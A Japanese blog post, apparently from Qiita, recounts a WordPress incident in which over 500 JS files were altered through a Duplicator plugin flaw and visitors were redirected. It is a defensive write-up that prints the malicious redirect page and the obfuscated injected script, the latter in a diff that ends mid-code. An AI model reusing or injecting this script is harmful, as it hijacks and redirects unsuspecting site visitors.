Help us understand the problem. What is going on with this article?

WordPressのJSが改竄された話。情報モトム => おかげさまで解決。

(更新 2019/02/24)
@prograti さんに 記事公開後すぐにコメントいただき、攻撃手法が特定できました。本当にありがとうございました。
WordPressのプラグイン Duplicatorのv1.2.40以前の脆弱性を突かれていました。
後日、別記事にその内容をまとめる予定です。

(更新 2019/02/26) 続編2
WordPressのJSが改竄された話。その2「攻撃手法の詳細共有」悪用 ダメ。ゼッタイ。

(更新 2019/03/16) 続編3
WordPressのJSが改竄された話。その3「再発防止編」(終)


どうも @koshi_life です。

この話です。

TL;DR

  • WordPressの公開ディレクトリをWebサーバ権限で書込可にしてたら、500個以上のJSを改ざんされたよ。
  • WordPressにアクセス後に2段階リダイレクトされて英語サイトに飛ぶ事象だったよ。誰か知ってる?対策知ってたら教えて。
  • 改ざんされた時は、まず改ざん前後それぞれの資材の diff を取ると、改ざん箇所が特定できるので、復旧と暫定対処がきっと早くできるよ。

事象.png

まえがき

投稿時点(2019/02/23)で
改ざんされた手法がわかっておらず、根本対策ができていないので、
もしなにか情報をお持ちの方はがいらしたら、コメントにて情報もらえるととても有り難いです。

クラッキングされたのが初めてで、
振り返ってみると最初からこう調べればもっと早く復旧できたなーって思うことがあるので、

極力インシデント対応はやりたくないですが、避けられない事態に遭遇しないとは言えないので、
改ざんされた時の対策を気づいたベースでまとめられたらと思います。

環境

  • WordPress v5.0.3

事象: WordPressサイトにアクセスすると、2段階でリダイレクトされて英語サイトに飛ばされる

サイトのURLにアクセスしたら約3秒後に真っ白なページにリダイレクト。
その後、約1秒後に次の英語サイトにリダイレクトされ、
本来のサイト機能が全く提供できない状態になる事象でした。

事象イメージ(再掲)
事象.png

1回目のリダイレクト先、2回目のリダイレクト先はランダムでしたが、同じURLに飛ぶこともありました。

1回目のリダイレクト先で実際に飛ばされたURLと中身

  • URL
    • duelsouhait.tk/index/?4831537102803
  • 中身(HTML)
<script>
function go() {
  window.frames[0].document.body.innerHTML = '<form target="_parent" method="post" action="http://mashina.com/mblog/latestpost"></form>';
  window.frames[0].document.forms[0].submit() |
}
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>

一定時間99msが経過したらリダイレクトさせるJSの内容でした。

2回目のリダイレクト先で実際に飛ばされたURL (一部)

ランダムなブログ記事に遷移させられました。

直接的原因

改ざん前と改ざん後のWordPressのトップページが返却したHTMLを比較してみると
ヘッダー部分に難読化された見覚えのない怪しいJSが含まれていました。

実際の差分とJS

$ diff before.html after.html
6c6
< <head><script type="text/javascript">var _0x4c2c=["\x56\x79\x7A\x43\x6B\x63\x4B\x65\x77\x37\x67\x39\x64\x43\x6C\x36\x77\x70\x6E\x43\x6F\x63\x4F\x57\x51\x38\x4B\x57\x63\x57\x44\x44\x74\x47\x67\x63\x77\x70\x6B\x3D","\x4D\x73\x4B\x76\x77\x34\x72\x44\x6A\x4D\x4B\x6B\x59\x77\x37\x43\x69\x57\x6A\x43\x71\x38\x4F\x57\x56\x77\x3D\x3D","\x63\x38\x4B\x43\x77\x6F\x66\x43\x71\x63\x4F\x6B\x77\x71\x41\x7A\x77\x70\x76\x44\x73\x63\x4F\x64","\x45\x73\x4B\x4B\x42\x33\x63\x35\x53\x77\x3D\x3D","\x62\x57\x37\x43\x6E\x52\x2F\x44\x67\x73\x4B\x78\x45\x63\x4F\x72\x4A\x6D\x6A\x44\x76\x77\x37\x44\x75\x77\x3D\x3D","\x77\x70\x72\x43\x73\x63\x4F\x4D\x77\x71\x7A\x43\x69\x52\x70\x42\x42\x47\x6F\x3D","\x46\x44\x6A\x44\x73\x38\x4F\x6C\x77\x6F\x70\x65\x77\x72\x31\x5A\x46\x51\x3D\x3D","\x47\x43\x2F\x43\x6B\x4D\x4B\x31\x77\x37\x63\x73\x63\x43\x4E\x36\x77\x34\x58\x44\x75\x38\x4B\x30\x51\x63\x4F\x69\x5A\x6D\x62\x44\x69\x43\x6B\x46\x77\x6F\x6E\x44\x6A\x79\x78\x4B\x77\x36\x73\x6C\x77\x35\x64\x61\x77\x6F\x5A\x56\x77\x70\x45\x78\x77\x35\x37\x44\x68\x63\x4B\x79\x5A\x4D\x4F\x79\x77\x35\x48\x44\x6D\x4D\x4F\x6E\x54\x57\x49\x72\x52\x38\x4F\x2F\x4A\x63\x4F\x65\x45\x57\x58\x43\x75\x6D\x5A\x4C\x77\x71\x54\x44\x6F\x73\x4B\x59\x77\x70\x76\x44\x70\x4D\x4B\x58\x77\x72\x58\x44\x6C\x55\x38\x30\x77\x70\x2F\x44\x76\x43\x31\x46\x59\x44\x72\x43\x6E\x47\x55\x57\x4B\x38\x4B\x71\x77\x35\x67\x55\x64\x69\x70\x35\x77\x71\x50\x44\x6B\x4D\x4B\x2F\x77\x37\x34\x54\x77\x36\x4C\x44\x72\x78\x49\x55\x77\x34\x62\x44\x69\x46\x4C\x43\x6F\x63\x4F\x4D\x4D\x31\x4C\x44\x71\x52\x78\x4C\x49\x4D\x4F\x58\x77\x6F\x67\x6F\x77\x37\x56\x62\x5A\x63\x4B\x4F\x57\x38\x4B\x74\x4C\x63\x4F\x45\x77\x6F\x63\x54\x77\x36\x6B\x74\x77\x70\x78\x5A\x77\x70\x4A\x34\x58\x6C\x54\x43\x68\x54\x77\x42\x61\x73\x4B\x58\x77\x36\x54\x44\x67\x73\x4B\x75\x77\x34\x76\x43\x69\x47\x4D\x57\x63\x30\x30\x44\x59\x53\x70\x72\x77\x36\x4E\x35\x77\x72\x46\x47\x77\x6F\x68\x4E\x77\x6F\x6A\x43\x6F\x30\x46\x50\x77\x70\x4C\x43\x76\x63\x4F\x67\x45\x33\x73\x36\x77\x37\x4C\x44\x6A\x63\x4B\x33\x77\x71\x37\x43\x6F\x63\x4B\x65\x62\x6A\x6F\x2B\x64\x63\x4F\x4C\x77\x36\x74\x59\x49\x38\x4F\x32\x4A\x77\x6E\x44\x71\x43\x41\x54\x5A\x73\x4F\x78\x56\x4D\x4B\x57\x77\x35\x7A\x44\x72\x46\x4A\x48\x77\x35\x38\x69\x51\x47\x62\x44\x6E\x30\x51\x4B\x77\x34\x33\x44\x6D\x73\x4B\x77\x77\x37\x64\x6D\x61\x32\x44\x43\x6C\x38\x4F\x47\x77\x36\x42\x37\x58\x48\x76\x43\x6F\x73\x4B\x7A\x45\x79\x37\x44\x6C\x55\x49\x56\x77\x36\x42\x55\x51\x4D\x4F\x4F\x63\x73\x4B\x68\x77\x37\x6E\x44\x69\x45\x72\x44\x75\x6A\x6F\x55\x63\x6A\x7A\x44\x72\x7A\x51\x74\x77\x37\x72\x43\x75\x77\x6E\x44\x6F\x73\x4F\x5A\x59\x45\x4D\x78\x77\x6F\x77\x6F\x77\x72\x74\x2B\x77\x37\x37\x43\x73\x4D\x4B\x6C\x54\x55\x33\x44\x69\x7A\x6B\x44\x77\x35\x55\x77\x62\x73\x4B\x70\x4C\x73\x4F\x4B\x77\x35\x48\x43\x67\x38\x4F\x45\x56\x4D\x4F\x62\x55\x38\x4B\x70\x77\x36\x6E\x43\x72\x4D\x4B\x2B\x61\x6C\x4C\x44\x6F\x63\x4F\x57\x4C\x4D\x4B\x44\x77\x6F\x7A\x44\x6D\x63\x4B\x50\x77\x35\x33\x44\x69\x67\x6A\x43\x6A\x73\x4F\x42\x4F\x33\x48\x44\x74\x6B\x7A\x44\x75\x73\x4F\x71\x77\x70\x76\x44\x68\x6C\x59\x57\x53\x41\x50\x43\x6F\x38\x4F\x77\x77\x6F\x30\x68\x61\x78\x73\x74\x66\x6B\x7A\x43\x6C\x63\x4F\x6C\x77\x70\x46\x56\x5A\x54\x49\x63\x77\x34\x4D\x74\x51\x7A\x6B\x65\x77\x35\x2F\x44\x6A\x4D\x4B\x30\x41\x63\x4F\x77\x56\x63\x4F\x39\x77\x36\x63\x52\x57\x73\x4F\x68\x77\x37\x74\x61\x77\x6F\x37\x43\x73\x30\x50\x44\x74\x63\x4F\x52\x77\x72\x58\x44\x6B\x38\x4F\x61\x77\x72\x6A\x44\x6C\x41\x46\x69\x77\x36\x37\x44\x67\x73\x4B\x74\x4D\x63\x4B\x71\x49\x43\x4C\x43\x6F\x41\x62\x44\x6E\x4D\x4F\x76\x77\x72\x30\x37\x41\x73\x4F\x74\x53\x68\x63\x45\x77\x72\x52\x51\x43\x73\x4B\x47\x64\x38\x4B\x61\x45\x47\x67\x70\x45\x54\x78\x2F\x77\x6F\x6A\x44\x6B\x38\x4F\x50\x63\x78\x4D\x73\x77\x70\x30\x50\x77\x72\x54\x43\x70\x56\x44\x43\x6E\x73\x4B\x42\x77\x72\x6E\x44\x6D\x55\x6E\x44\x74\x63\x4F\x69\x77\x71\x45\x4F\x77\x6F\x50\x43\x70\x38\x4F\x59\x58\x38\x4B\x62\x47\x73\x4F\x44\x53\x51\x6F\x4A\x77\x36\x63\x63\x77\x72\x58\x43\x71\x4D\x4B\x73\x77\x70\x6A\x44\x6C\x4D\x4B\x4E\x59\x45\x58\x44\x69\x31\x48\x44\x74\x38\x4F\x6F\x77\x72\x70\x72\x77\x35\x37\x44\x74\x32\x77\x6F\x44\x63\x4B\x61\x77\x37\x62\x43\x73\x63\x4F\x71\x53\x4D\x4B\x55\x77\x71\x50\x43\x74\x73\x4F\x6C\x52\x4D\x4F\x43\x4F\x30\x35\x65\x77\x34\x76\x44\x6F\x4D\x4B\x46\x77\x35\x64\x44\x77\x70\x41\x73\x77\x6F\x74\x2B\x77\x34\x6F\x72\x47\x58\x6C\x73\x77\x70\x30\x71\x58\x63\x4F\x73\x4B\x4D\x4F\x6A\x77\x71\x58\x43\x6F\x4D\x4B\x72\x77\x36\x73\x30\x62\x63\x4F\x2B\x77\x36\x56\x6C\x55\x6E\x76\x43\x68\x73\x4F\x4D\x77\x36\x35\x50\x77\x36\x54\x44\x76\x78\x76\x43\x68\x43\x33\x44\x71\x4D\x4B\x7A\x77\x6F\x70\x56\x77\x36\x4C\x43\x74\x33\x74\x59\x64\x6A\x62\x44\x6E\x6D\x30\x65\x45\x53\x48\x44\x74\x73\x4B\x64\x77\x37\x59\x52\x77\x6F\x58\x43\x67\x56\x64\x53\x77\x34\x4C\x44\x74\x63\x4B\x35\x66\x73\x4B\x63\x77\x72\x6F\x55\x77\x70\x7A\x43\x76\x38\x4F\x32\x56\x31\x44\x44\x6D\x6B\x58\x44\x68\x52\x51\x4C\x47\x73\x4F\x6B\x77\x6F\x6C\x32\x4A\x63\x4B\x56\x77\x34\x56\x74\x77\x35\x66\x43\x67\x51\x6C\x6C\x44\x73\x4F\x67\x77\x72\x6A\x44\x74\x4D\x4F\x2B\x4B\x6D\x73\x36\x77\x35\x39\x6A\x77\x37\x37\x43\x68\x31\x44\x43\x73\x44\x52\x69\x77\x34\x33\x43\x6F\x33\x6E\x43\x73\x63\x4F\x59\x77\x36\x6C\x72\x77\x72\x70\x33\x58\x73\x4B\x36\x77\x72\x6F\x70\x77\x71\x6A\x43\x6D\x63\x4F\x30\x77\x70\x55\x4F\x63\x6C\x48\x44\x6B\x69\x76\x43\x75\x48\x4C\x44\x6B\x63\x4B\x72\x77\x35\x66\x44\x70\x45\x76\x44\x70\x32\x76\x43\x75\x38\x4B\x32\x4E\x67\x54\x44\x69\x38\x4F\x6A\x77\x37\x44\x44\x73\x63\x4F\x4F\x46\x73\x4B\x49\x77\x70\x62\x44\x6E\x58\x59\x37\x77\x6F\x38\x39\x52\x77\x44\x43\x69\x63\x4B\x58\x62\x47\x56\x6E\x49\x42\x62\x44\x6D\x4D\x4F\x45\x77\x35\x62\x43\x6B\x38\x4F\x4D\x52\x4D\x4F\x77\x64\x4D\x4B\x50\x77\x35\x54\x44\x6D\x32\x45\x31\x77\x72\x37\x44\x6A\x57\x37\x44\x74\x73\x4F\x32\x41\x63\x4F\x56\x77\x36\x67\x65\x55\x54\x77\x2F\x77\x34\x4D\x73\x77\x71\x6B\x2B\x77\x37\x48\x44\x75\x4D\x4B\x6E\x77\x72\x38\x31\x4E\x4D\x4B\x58\x77\x36\x33\x44\x74\x6A\x66\x43\x67\x73\x4B\x6B\x77\x37\x64\x39\x77\x6F\x50\x43\x6E\x56\x70\x42\x77\x36\x31\x6F\x42\x4D\x4B\x39\x65\x78\x63\x4D\x55\x73\x4F\x73\x4A\x73\x4B\x2B\x61\x38\x4B\x53\x55\x31\x42\x4A\x53\x4D\x4F\x74\x66\x48\x70\x51\x77\x70\x6A\x44\x6F\x73\x4F\x63\x77\x35\x6E\x44\x6F\x63\x4F\x52\x77\x35\x45\x6B\x77\x71\x4C\x44\x6F\x4D\x4F\x42\x77\x6F\x35\x35\x77\x34\x6A\x44\x69\x33\x34\x75\x63\x38\x4F\x43\x44\x48\x6A\x43\x68\x33\x6E\x44\x6A\x43\x48\x44\x67\x73\x4B\x52\x4B\x73\x4F\x6F\x77\x35\x76\x43\x68\x77\x78\x64\x77\x36\x4C\x43\x6A\x38\x4F\x5A\x57\x67\x49\x61\x77\x71\x44\x43\x68\x4D\x4F\x51\x66\x63\x4F\x6C\x77\x36\x50\x43\x75\x73\x4F\x74\x4B\x38\x4F\x2B\x77\x35\x6A\x44\x76\x38\x4B\x46\x65\x32\x59\x57\x57\x73\x4F\x36\x47\x33\x72\x44\x75\x41\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x55\x44\x50\x4D\x49\x55","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x58\x70\x44\x42\x61\x53","\x53\x4A\x4E\x65\x62\x4B","\x6C\x75\x42\x49\x48\x6B","\x30\x78\x30","\x43\x31\x25\x4A","\x30\x78\x31","\x49\x39\x5A\x77","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x69\x64","\x30\x78\x32","\x36\x65\x21\x42","\x30\x78\x33","\x5A\x41\x54\x25","\x30\x78\x34","\x76\x57\x51\x5D","\x30\x78\x35","\x30\x78\x36","\x4B\x4D\x61\x25","\x30\x78\x37","\x6C\x6A\x70\x56"];var _0x69b4=[_0x4c2c[0],_0x4c2c[1],_0x4c2c[2],_0x4c2c[3],_0x4c2c[4],_0x4c2c[5],_0x4c2c[6],_0x4c2c[7],_0x4c2c[8],_0x4c2c[9],_0x4c2c[10],_0x4c2c[11],_0x4c2c[12],_0x4c2c[13],_0x4c2c[14],_0x4c2c[15],_0x4c2c[16],_0x4c2c[17],_0x4c2c[18],_0x4c2c[19],_0x4c2c[20],_0x4c2c[21],_0x4c2c[22],_0x4c2c[23],_0x4c2c[24],_0x4c2c[25],_0x4c2c[26],_0x4c2c[27],_0x4c2c[28],_0x4c2c[29],_0x4c2c[30],_0x4c2c[31],_0x4c2c[32],_0x4c2c[33],_0x4c2c[34],_0x4c2c[35],_0x4c2c[36],_0x4c2c[37],_0x4c2c[38],_0x4c2c[39],_0x4c2c[40],_0x4c2c[41],_0x4c2c[42],_0x4c2c[43],_0x4c2c[44],_0x4c2c[45],_0x4c2c[46],_0x4c2c[47],_0x4c2c[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0xe0fbx3,_0xe0fbx4){var _0xe0fbx5=function(_0xe0fbx6){while(--_0xe0fbx6){_0xe0fbx3[_0x69b4[9]](_0xe0fbx3[_0x69b4[8]]())}};_0xe0fbx5(++_0xe0fbx4)}(_0x53ac,0x6b));var _0x4824=function(_0xe0fbx8,_0xe0fbx9){_0xe0fbx8= _0xe0fbx8- 0x0;var _0xe0fbxa=_0x53ac[_0xe0fbx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0xe0fbxb=function(){var _0xe0fbxc;try{_0xe0fbxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0xe0fbxc= window};return _0xe0fbxc};var _0xe0fbxd=_0xe0fbxb();var _0xe0fbxe=_0x69b4[14];_0xe0fbxd[_0x69b4[15]]|| (_0xe0fbxd[_0x69b4[15]]= function(_0xe0fbxf){var _0xe0fbx10=String(_0xe0fbxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0xe0fbx11=0x0,_0xe0fbx12,_0xe0fbx13,_0xe0fbx14=0x0,_0xe0fbx15=_0x69b4[16];_0xe0fbx13= _0xe0fbx10[_0x69b4[18]](_0xe0fbx14++);~_0xe0fbx13&& (_0xe0fbx12= _0xe0fbx11% 0x4?_0xe0fbx12* 0x40+ _0xe0fbx13:_0xe0fbx13,_0xe0fbx11++ % 0x4)?_0xe0fbx15+= String[_0x69b4[19]](0xff& _0xe0fbx12>> (-0x2* _0xe0fbx11 & 0x6)):0x0){_0xe0fbx13= _0xe0fbxe[_0x69b4[20]](_0xe0fbx13)};return _0xe0fbx15})}());var _0xe0fbx16=function(_0xe0fbx17,_0xe0fbx9){var _0xe0fbx18=[],_0xe0fbx19=0x0,_0xe0fbx1a,_0xe0fbx1b=_0x69b4[16],_0xe0fbx1c=_0x69b4[16];_0xe0fbx17= atob(_0xe0fbx17);for(var _0xe0fbx1d=0x0,_0xe0fbx1e=_0xe0fbx17[_0x69b4[21]];_0xe0fbx1d< _0xe0fbx1e;_0xe0fbx1d++){_0xe0fbx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0xe0fbx17[_0x69b4[26]](_0xe0fbx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0xe0fbx17= decodeURIComponent(_0xe0fbx1c);for(var _0xe0fbx1f=0x0;_0xe0fbx1f< 0x100;_0xe0fbx1f++){_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx1f};for(_0xe0fbx1f= 0x0;_0xe0fbx1f< 0x100;_0xe0fbx1f++){_0xe0fbx19= (_0xe0fbx19+ _0xe0fbx18[_0xe0fbx1f]+ _0xe0fbx9[_0x69b4[26]](_0xe0fbx1f% _0xe0fbx9[_0x69b4[21]]))% 0x100;_0xe0fbx1a= _0xe0fbx18[_0xe0fbx1f];_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx18[_0xe0fbx19];_0xe0fbx18[_0xe0fbx19]= _0xe0fbx1a};_0xe0fbx1f= 0x0;_0xe0fbx19= 0x0;for(var _0xe0fbx20=0x0;_0xe0fbx20< _0xe0fbx17[_0x69b4[21]];_0xe0fbx20++){_0xe0fbx1f= (_0xe0fbx1f+ 0x1)% 0x100;_0xe0fbx19= (_0xe0fbx19+ _0xe0fbx18[_0xe0fbx1f])% 0x100;_0xe0fbx1a= _0xe0fbx18[_0xe0fbx1f];_0xe0fbx18[_0xe0fbx1f]= _0xe0fbx18[_0xe0fbx19];_0xe0fbx18[_0xe0fbx19]= _0xe0fbx1a;_0xe0fbx1b+= String[_0x69b4[19]](_0xe0fbx17[_0x69b4[26]](_0xe0fbx20)^ _0xe0fbx18[(_0xe0fbx18[_0xe0fbx1f]+ _0xe0fbx18[_0xe0fbx19])% 0x100])};return _0xe0fbx1b};_0x4824[_0x69b4[27]]= _0xe0fbx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !![]};var _0xe0fbx21=_0x4824[_0x69b4[28]][_0xe0fbx8];if(_0xe0fbx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !![]};_0xe0fbxa= _0x4824[_0x69b4[27]](_0xe0fbxa,_0xe0fbx9);_0x4824[_0x69b4[28]][_0xe0fbx8]= _0xe0fbxa}else {_0xe0fbxa= _0xe0fbx21};return _0xe0fbxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0xe0fbx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0xe0fbx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0xe0fbx28[_0x2b0b54[0x4]]=  !![];_0xe0fbx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0xe0fbx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0xe0fbx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0xe0fbx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0xe0fbx28,_0xe0fbx29)}());</script>
---
> <head>
71c71
< <script type="text/javascript">var _0x4c2c=["\x56\x79\x7A\x43\x6B\x63\x4B\x65\x77\x37\x67\x39\x64\x43\x6C\x36\x77\x70\x6E\x43\x6F\x63\x4F\x57\x51\x38\x4B\x57\x63\x57\x44\x44\x74\x47\x67\x63\x77\x70\x6B\x3D","\x4D\x73\x4B\x76\x77\x34\x72\x44\x6A\x4D\x4B\x6B\x59\x77\x37\x43\x69\x57\x6A\x43\x71\x38\x4F\x57\x56\x77\x3D\x3D","\x63\x38\x4B\x43\x77\x6F\x66\x43\x71\x63\x4F\x6B\x77\x71\x41\x7A\x77\x70\x76\x44\x73\x63\x4F\x64","\x45\x73\x4B\x4B\x42\x33\x63\x35\x53\x77\x3D\x3D","\x62\x57\x37\x43\x6E\x52\x2F\x44\x67\x73\x4B\x78\x45\x63\x4F\x72\x4A\x6D\x6A\x44\x76\x77\x37\x44\x75\x77\x3D\x3D","\x77\x70\x72\x43\x73\x63\x4F\x4D\x77\x71\x7A\x43\x69\x52\x70\x42\x42\x47\x6F\x3D","\x46\x44\x6A\x44\x73\x38\x4F\x6C\x77\x6F\x70\x65\x77\x72\x31\x5A\x46\x51\x3D\x3D","\x47\x43\x2F\x43\x6B\x4D\x4B\x31\x77\x37\x63\x73\x63\x43\x4E\x36\x77\x34\x58\x44\x75\x38\x4B\x30\x51\x63\x4F\x69\x5A\x6D\x62\x44\x69\x43\x6B\x46\x77\x6F\x6E\x44\x6A\x79\x78\x4B\x77\x36\x73\x6C\x77\x35\x64\x61\x77\x6F\x5A\x56\x77\x70\x45\x78\x77\x35\x37\x44\x68\x63\x4B\x79\x5A\x4D\x4F\x79\x77\x35\x48\x44\x6D\x4D\x4F\x6E\x54\x57\x49\x72\x52\x38\x4F\x2F\x4A\x63\x4F\x65\x45\x57\x58\x43\x75\x6D\x5A\x4C\x77\x71\x54\x44\x6F\x73\x4B\x59\x77\x70\x76\x44\x70\x4D\x4B\x58\x77\x72\x58\x44\x6C\x55\x38\x30\x77\x70\x2F\x44\x76\x43\x31\x46\x59\x44\x72\x43\x6E\x47\x55\x57\x4B\x38\x4B\x71\x77\x35\x67\x55\x64\x69\x70\x35\x77\x71\x50\x44\x6B\x4D\x4B\x2F\x77\x37\x34\x54\x77\x36\x4C\x44\x72\x78\x49\x55\x77\x34\x62\x44\x69\x46\x4C\x43\x6F\x63\x4F\x4D\x4D\x31\x4C\x44\x71\x52\x78\x4C\x49\x4D\x4F\x58\x77\x6F\x67\x6F\x77\x37\x56\x62\x5A\x63\x4B\x4F\x57\x38\x4B\x74\x4C\x63\x4F\x45\x77\x6F\x63\x54\x77\x36\x6B\x74\x77\x70\x78\x5A\x77\x70\x4A\x34\x58\x6C\x54\x43\x68\x54\x77\x42\x61\x73\x4B\x58\x77\x36\x54\x44\x67\x73\x4B\x75\x77\x34\x76\x43\x69\x47\x4D\x57\x63\x30\x30\x44\x59\x53\x70\x72\x77\x36\x4E\x35\x77\x72\x46\x47\x77\x6F\x68\x4E\x77\x6F\x6A\x43\x6F\x30\x46\x50\x77\x70\x4C\x43\x76\x63\x4F\x67\x45\x33\x73\x36\x77\x37\x4C\x44\x6A\x63\x4B\x33\x77\x71\x37\x43\x6F\x63\x4B\x65\x62\x6A\x6F\x2B\x64\x63\x4F\x4C\x77\x36\x74\x59\x49\x38\x4F\x32\x4A\x77\x6E\x44\x71\x43\x41\x54\x5A\x73\x4F\x78\x56\x4D\x4B\x57\x77\x35\x7A\x44\x72\x46\x4A\x48\x77\x35\x38\x69\x51\x47\x62\x44\x6E\x30\x51\x4B\x77\x34\x33\x44\x6D\x73\x4B\x77\x77\x37\x64\x6D\x61\x32\x44\x43\x6C\x38\x4F\x47\x77\x36\x42\x37\x58\x48\x76\x43\x6F\x73\x4B\x7A\x45\x79\x37\x44\x6C\x55\x49\x56\x77\x36\x42\x55\x51\x4D\x4F\x4F\x63\x73\x4B\x68\x77\x37\x6E\x44\x69\x45\x72\x44\x75\x6A\x6F\x55\x63\x6A\x7A\x44\x72\x7A\x51\x74\x77\x37\x72\x43\x75\x77\x6E\x44\x6F\x73\x4F\x5A\x59\x45\x4D\x78\x77\x6F\x77\x6F\x77\x72\x74\x2B\x77\x37\x37\x43\x73\x4D\x4B\x6C\x54\x55\x33\x44\x69\x7A\x6B\x44\x77\x35\x55\x77\x62\x73\x4B\x70\x4C\x73\x4F\x4B\x77\x35\x48\x43\x67\x38\x4F\x45\x56\x4D\x4F\x62\x55\x38\x4B\x70\x77\x36\x6E\x43\x72\x4D\x4B\x2B\x61\x6C\x4C\x44\x6F\x63\x4F\x57\x4C\x4D\x4B\x44\x77\x6F\x7A\x44\x6D\x63\x4B\x50\x77\x35\x33\x44\x69\x67\x6A\x43\x6A\x73\x4F\x42\x4F\x33\x48\x44\x74\x6B\x7A\x44\x75\x73\x4F\x71\x77\x70\x76\x44\x68\x6C\x59\x57\x53\x41\x50\x43\x6F\x38\x4F\x77\x77\x6F\x30\x68\x61\x78\x73\x74\x66\x6B\x7A\x43\x6C\x63\x4F\x6C\x77\x70\x46\x56\x5A\x54\x49\x63\x77\x34\x4D\x74\x51\x7A\x6B\x65\x77\x35\x2F\x44\x6A\x4D\x4B\x30\x41\x63\x4F\x77\x56\x63\x4F\x39\x77\x36\x63\x52\x57\x73\x4F\x68\x77\x37\x74\x61\x77\x6F\x37\x43\x73\x30\x50\x44\x74\x63\x4F\x52\x77\x72\x58\x44\x6B\x38\x4F\x61\x77\x72\x6A\x44\x6C\x41\x46\x69\x77\x36\x37\x44\x67\x73\x4B\x74\x4D\x63\x4B\x71\x49\x43\x4C\x43\x6F\x41\x62\x44\x6E\x4D\x4F\x76\x77\x72\x30\x37\x41\x73\x4F\x74\x53\x68\x63\x45\x77\x72\x52\x51\x43\x73\x4B\x47\x64\x38\x4B\x61\x45\x47\x67\x70\x45\x54\x78\x2F\x77\x6F\x6A\x44\x6B\x38\x4F\x50\x63\x78\x4D\x73\x77\x70\x30\x50\x77\x72\x54\x43\x70\x56\x44\x43\x6E\x73\x4B\x42\x77\x72\x6E\x44\x6D\x55\x6E\x44\x74\x63\x4F\x69\x77\x71\x45\x4F\x77\x6F\x50\x43\x70\x38\x4F\x59\x58\x38\x4B\x62\x47\x73\x4F\x44\x53\x51\x6F\x4A\x77\x36\x63\x63\x77\x72\x58\x43\x71\x4D\x4B\x73\x77\x70\x